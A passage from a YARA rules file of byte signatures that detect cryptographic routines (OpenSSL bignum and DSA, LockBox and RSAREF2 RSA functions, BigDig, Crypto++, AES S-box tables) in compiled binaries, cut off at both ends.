5E 5B 81 C4 30 05 00 00 C3 3B F7 89 74 24 18 7F 04 89 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 A0 02 00 00 E8 ?? ?? ?? ?? 53 56 57 8B BC 24 BC 02 00 00 33 F6 8B 07 89 74 24 24 89 74 24 20 89 74 24 0C F6 00 01 75 24 68 72 01 00 00 68 ?? ?? ?? ?? 6A 66 6A 6D 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 A0 02 00 00 C3 8B 8C 24 B8 02 00 00 51 E8 ?? ?? ?? ?? 8B D8 83 C4 04 3B DE 89 5C 24 18 75 1C 8B 94 24 B0 02 00 00 6A 01 52 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5B 81 C4 A0 02 00 00 C3 55 8B AC 24 C4 02 00 00 55 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B F0 55 89 74 24 24 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_recp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_recp\"\r\n\tstrings:\r\n\t\t$c0 = { B8 C8 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 D4 02 00 00 55 56 33 F6 50 89 74 24 1C 89 74 24 18 E8 ?? ?? ?? ?? 8B E8 83 C4 04 3B EE 89 6C 24 0C 75 1B 8B 8C 24 D4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 C8 02 00 00 C3 53 57 8B BC 24 EC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DE 0F 84 E7 02 00 00 8D 54 24 24 52 E8 ?? ?? ?? ?? 8B B4 24 EC 02 00 00 83 C4 04 8B 46 0C 85 C0 74 32 56 53 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 BA 02 00 00 57 8D 44 24 28 53 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_simple\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_simple\"\r\n\tstrings:\r\n\t\t$c0 = { B8 98 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 A4 02 00 00 55 56 33 ED 50 89 6C 24 1C 89 6C 24 18 E8 ?? ?? ?? ?? 8B F0 83 C4 04 3B F5 89 74 24 0C 75 1B 8B 8C 24 A4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 98 02 00 00 C3 53 57 8B BC 24 BC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DD 0F 84 71 02 00 00 8D 54 24 28 52 E8 ?? ?? ?? ?? 8B AC 24 BC 02 00 00 8B 84 24 B4 02 00 00 57 55 8D 4C 24 34 50 51 C7 44 24 30 01 00 00 00 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_inverse\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_inverse\"\r\n\tstrings:\r\n\t\t$c0 = { B8 18 00 00 00 E8 ?? ?? ?? ?? 53 55 56 57 8B 7C 24 38 33 C0 57 89 44 24 20 89 44 24 24 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 57 89 44 24 1C E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 57 89 44 24 28 E8 ?? ?? ?? ?? 57 8B E8 E8 ?? ?? ?? ?? 57 8B D8 E8 ?? ?? ?? ?? 8B F8 8B 44 24 54 50 89 7C 24 38 E8 ?? ?? ?? ?? 83 C4 20 89 44 24 24 85 C0 8B 44 24 2C 0F 84 78 05 00 00 85 C0 75 05 E8 ?? ?? ?? ?? 85 C0 89 44 24 1C 0F 84 63 05 00 00 8B 4C 24 14 6A 01 51 E8 ?? ?? ?? ?? 6A 00 57 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_DSA\r\n{\r\n\tmeta:\r\n\t\tauthor=\"_pusher_\"\r\n\t\tdate=\"2016-08\"\r\n\tstrings:\t\r\n\t\t$a0 = \"bignum_data\" wide ascii nocase\r\n\t\t$a1 = \"DSA_METHOD\" wide ascii nocase\r\n\t\t$a2 = \"PDSA\" wide ascii nocase\r\n\t\t$a3 = \"dsa_mod_exp\" wide ascii nocase\r\n\t\t$a4 = \"bn_mod_exp\" wide ascii nocase\r\n\t\t$a5 = \"dsa_do_verify\" wide ascii nocase\r\n\t\t$a6 = \"dsa_sign_setup\" wide ascii nocase\r\n\t\t$a7 = \"dsa_do_sign\" wide ascii nocase\r\n\t\t$a8 = \"dsa_paramgen\" wide ascii nocase\r\n\t\t$a9 = \"BN_MONT_CTX\" wide ascii nocase\r\n\tcondition:\r\n\t\t7 of ($a*)\r\n}\r\n\r\nrule FGint_RsaSign\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaSign\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B8 53 56 57 89 4D F8 8B FA 89 45 FC 8B 75 0C 8B 5D 10 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 F0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule LockBox_RsaEncryptFile\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox RsaEncryptFile\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 8B F1 8B DA 6A 20 8B C8 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 FC 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 68 FF FF 00 00 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8A 45 08 50 8B CE 8B 55 F8 8B 45 FC E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_DecryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox DecryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 89 4D F8 89 55 FC 8B D8 33 C0 8A 43 04 0F B7 34 45 ?? ?? ?? ?? 0F B7 3C 45 ?? ?? ?? ?? 8B CE B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 FC 8B CE 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 B1 02 8B D3 8B 45 F4 E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B C7 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 8B C8 8B 55 F8 8B 45 F4 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_EncryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox EncryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 57 89 4D FC 8B FA 8B F0 33 C0 8A 46 04 0F B7 1C 45 ?? ?? ?? ?? 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B D7 8B 4D 08 8B 45 F8 E8 ?? ?? ?? ?? 6A 01 B1 02 8B D6 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 3B C3 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B C8 8B 55 FC 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F8 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_TlbRsaKey\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox TlbRsaKey\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 84 D2 74 08 83 C4 F0 E8 ?? ?? ?? ?? 8B DA 8B F0 33 D2 8B C6 E8 ?? ?? ?? ?? 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 0C 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 10 8B C6 84 DB 74 0F E8 ?? ?? ?? ?? 64 8F 05 00 00 00 00 83 C4 0C 8B C6 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_bpInit\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig bpInit\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 0C 6A 04 56 E8 ?? ?? ?? ?? 8B C8 8B 44 24 10 83 C4 08 85 C9 89 08 75 04 33 C0 5E C3 89 70 08 C7 40 04 00 00 00 00 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 18 85 F6 75 05 83 C8 FF 5E C3 53 55 8B 6C 24 18 57 56 55 E8 ?? ?? ?? ?? 8B D8 83 C4 08 BF 00 00 00 80 8B 44 9D FC 85 C7 75 04 D1 EF 75 F8 83 FF 01 75 08 BF 00 00 00 80 4B EB 02 D1 EF 8B 44 24 18 56 8B 74 24 18 50 56 E8 ?? ?? ?? ?? 83 C4 0C 85 DB 74 4F 8D 6C 9D FC 8B 4C 24 24 8B 54 24 20 51 52 56 56 56 E8 ?? ?? ?? ?? 8B 45 00 83 C4 14 85 C7 74 19 8B 44 24 24 8B 4C 24 20 8B 54 24 18 50 51 52 56 56 E8 ?? ?? ?? ?? 83 C4 14 83 FF 01 75 0B 4B BF 00 00 00 80 83 ED 04 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 2C 07 00 00 8D 84 24 CC 00 00 00 53 56 8B B4 24 44 07 00 00 57 56 6A 01 50 E8 ?? ?? ?? ?? 8B 8C 24 4C 07 00 00 56 8D 94 24 80 02 00 00 51 52 E8 ?? ?? ?? ?? 8D 84 24 BC 01 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 64 07 00 00 56 8D 4C 24 30 53 51 E8 ?? ?? ?? ?? 8D 54 24 38 56 52 BF 01 00 00 00 E8 ?? ?? ?? ?? 83 C4 34 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 78 02 00 00 56 8D 94 24 48 03 00 00 51 8D 84 24 18 04 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 BC 01 00 00 56 8D 94 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 98 01 00 00 8D 54 24 00 56 8B B4 24 B0 01 00 00 57 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 C0 01 00 00 8B 94 24 B4 01 00 00 8D 3C 36 56 50 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 57 50 E8 ?? ?? ?? ?? 83 C4 2C 33 C0 5F 5E 81 C4 98 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModulo\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 10 81 EC 30 03 00 00 8B 8C 24 38 03 00 00 8D 54 24 00 56 8B B4 24 40 03 00 00 57 8B BC 24 4C 03 00 00 57 50 56 51 8D 84 24 B0 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 94 24 54 03 00 00 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 CC 01 00 00 56 51 E8 ?? ?? ?? ?? 83 C4 34 33 C0 5F 5E 81 C4 30 03 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModExpB\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModExpB\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B 5C 24 10 55 56 BE 00 00 00 80 85 F3 75 04 D1 EE 75 F8 8B 6C 24 14 8B C5 D1 EE 89 44 24 18 74 48 57 8B 7C 24 20 EB 04 8B 44 24 1C 57 50 50 8D 44 24 28 50 E8 ?? ?? ?? ?? 83 C4 10 85 F3 74 14 8B 4C 24 1C 57 55 8D 54 24 24 51 52 E8 ?? ?? ?? ?? 83 C4 10 D1 EE 75 D0 8B 44 24 14 8B 4C 24 1C 5F 5E 89 08 5D 33 C0 5B C3 8B 54 24 10 5E 5D 5B 89 02 33 C0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8B 4C 24 10 55 56 BD 01 00 00 00 33 F6 57 8B 7C 24 18 89 6C 24 0C 85 C9 74 42 53 8B C7 33 D2 F7 F1 8B C7 8B F9 8B DA 33 D2 F7 F1 8B CB 0F AF C6 03 C5 8B EE 8B F0 8B 44 24 10 F7 D8 85 DB 89 44 24 10 75 D7 85 C0 5B 7D 13 8B 44 24 1C 8B 4C 24 14 2B C5 5F 89 01 5E 33 C0 5D 59 C3 8B 54 24 14 5F 5E 33 C0 89 2A 5D 59 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 83 EC 08 8D 54 24 00 50 51 52 E8 ?? ?? ?? ?? 8B 44 24 24 6A 02 8D 4C 24 10 50 51 E8 ?? ?? ?? ?? 8B 54 24 24 89 02 33 C0 83 C4 20 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_ApplyFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP ApplyFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8D 41 E4 56 8B 74 24 0C 83 C1 F0 50 51 8B 4C 24 18 C7 44 24 0C 00 00 00 00 51 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5E 59 C2 08 00 }\r\n\t\t$c1 = { 51 53 56 8B F1 57 6A 00 C7 44 24 10 00 00 00 00 8B 46 04 8B 48 04 8B 5C 31 04 8D 7C 31 04 E8 ?? ?? ?? ?? 50 8B CF FF 53 10 8B 44 24 18 8D 56 08 83 C6 1C 52 56 8B 74 24 1C 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5F 5E 5B 59 C2 08 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_RsaFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP RsaFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC 9C 00 00 00 8B 84 24 B0 00 00 00 53 55 56 33 ED 8B F1 57 3B C5 89 B4 24 A8 00 00 00 89 6C 24 10 BF 01 00 00 00 74 18 C7 06 ?? ?? ?? ?? C7 46 20 ?? ?? ?? ?? 89 7C 24 10 89 AC 24 B4 00 00 00 8D 4E 04 E8 ?? ?? ?? ?? 8D 4E 10 89 BC 24 B4 00 00 00 E8 ?? ?? ?? ?? 8B 06 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 48 04 C7 04 31 ?? ?? ?? ?? 8B 16 8B 42 04 8B 54 24 10 83 CA 02 8D 48 E0 89 54 24 10 89 4C 30 FC 89 5C 24 18 89 7C }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 1C 53 8B 5C 24 1C 56 8B F1 57 33 C9 89 74 24 10 3B C1 89 4C 24 0C 74 7B C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 3B D9 75 06 89 4C 24 28 EB 0E 8B 43 04 8B 50 0C 8D 44 1A 04 89 44 24 28 8B 56 3C C7 44 24 0C 07 00 00 00 8B 42 04 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C C7 46 38 ?? ?? ?? ?? 8B 42 04 C7 44 30 3C }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 18 56 8B F1 57 85 C0 89 74 24 0C C7 44 24 08 00 00 00 00 74 63 C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 8B 46 3C C7 44 24 08 07 00 00 00 8B 48 04 C7 44 31 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 4E 3C C7 46 38 ?? ?? ?? ?? 8B 51 04 C7 44 32 3C ?? ?? ?? ?? 8B 46 3C 8B 48 08 C7 44 31 3C ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8D 7E 04 6A 00 8B CF }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_Integer_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP Integer constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 08 56 83 F8 08 8B F1 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 4C 24 0C 89 46 04 C7 46 08 00 00 00 00 89 08 8B 0E 8B 46 04 83 C4 04 49 74 0F 57 8D 78 04 33 C0 F3 AB 8B C6 5F 5E C2 08 00 8B C6 5E C2 08 00 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 89 74 24 04 C7 06 ?? ?? ?? ?? 6A 08 C7 44 24 14 00 00 00 00 C7 46 08 02 00 00 00 E8 ?? ?? ?? ?? 89 46 0C C7 46 10 00 00 00 00 C7 06 ?? ?? ?? ?? 8B 46 0C 83 C4 04 C7 40 04 00 00 00 00 8B 4E 0C 8B C6 5E C7 01 00 00 00 00 8B 4C 24 04 64 89 0D 00 00 00 00 83 C4 10 C3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 57 89 74 24 08 C7 06 ?? ?? ?? ?? 8B 7C 24 1C C7 44 24 14 00 00 00 00 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 85 D2 89 56 08 76 12 8D 04 95 00 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 04 EB 02 33 C0 89 46 0C 8B 4F 10 89 4E 10 }\r\n\t\t$c3 = { 56 57 8B 7C 24 0C 8B F1 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 16 89 46 04 8B 4F 08 83 C4 04 89 4E 08 8B 4F 04 85 D2 76 0D 2B C8 8B 3C 01 89 38 83 C0 04 4A 75 F5 8B C6 5F 5E C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RijnDael_AES\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { A5 63 63 C6 84 7C 7C F8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES (check2) [char]\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR_inv\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES S-inv [char]\"\r\n\t\t//needs improvement\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 48 38 47 00 88 17 33 D2 8A 56 0D 8A 92 48 38 47 00 88 57 01 33 D2 8A 56 0A 8A 92 48 38 47 00 88 57 02 33 D2 8A 56 07 8A 92 48 38 47 00 88 57 03 33 D2 8A 56 04 8A 92 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_LONG\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modExp\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 1C 02 00 00 53 55 56 8B B4 24 30 02 00 00 57 8B BC 24 44 02 00 00 57 8D 84 24 A4 00 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 4C 02 00 00 57 53 8D 8C 24 B4 00 00 00 56 8D 94 24 3C 01 00 00 51 52 E8 ?? ?? ?? ?? 57 53 8D 84 24 4C 01 00 00 56 8D 8C 24 D4 01 00 00 50 51 E8 ?? ?? ?? ?? 8D 54 24 50 57 52 E8 ?? ?? ?? ?? 8B 84 24 78 02 00 00 8B B4 24 74 02 00 00 50 56 C7 44 24 60 01 00 00 00 E8 ?? ?? ?? ?? 8D 48 FF 83 C4 44 8B E9 89 4C 24 18 85 ED 0F 8C AF 00 00 00 8D 34 AE 89 74 24 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RsaRef2_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 84 24 ?? 00 00 00 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 BC 24 A0 00 00 00 E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 4C 24 2C 53 51 E8 ?? ?? ?? ?? 8D 54 24 34 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 2C 01 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 68 08 01 00 00 8D 4C 24 2C 6A 00 51 E8 ?? ?? ?? ?? 83 C4 30 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F 85 8B 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6B 8A 4C 24 09 B8 02 00 00 00 3A C8 75 5E 8D 4E FF 3B C8 76 0D 8A 54 04 08 84 D2 74 05 40 3B C1 72 F3 40 3B C6 73 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A 8D 51 0B }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 8B 54 24 10 81 EC 80 00 00 00 8D 4A 0B 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 80 00 00 00 C3 8B CE B8 02 00 00 00 2B CA C6 44 24 04 00 49 C6 44 24 05 01 3B C8 76 23 53 55 8D 69 FE 57 8B CD 83 C8 FF 8B D9 8D 7C 24 12 C1 E9 02 F3 AB 8B CB 83 E1 03 F3 AA 8D 45 02 5F 5D 5B 52 8B 94 24 94 00 00 00 C6 44 04 08 00 8D 44 04 09 52 50 E8 ?? ?? ?? ?? 8B 8C 24 A4 00 00 00 8B 84 24 98 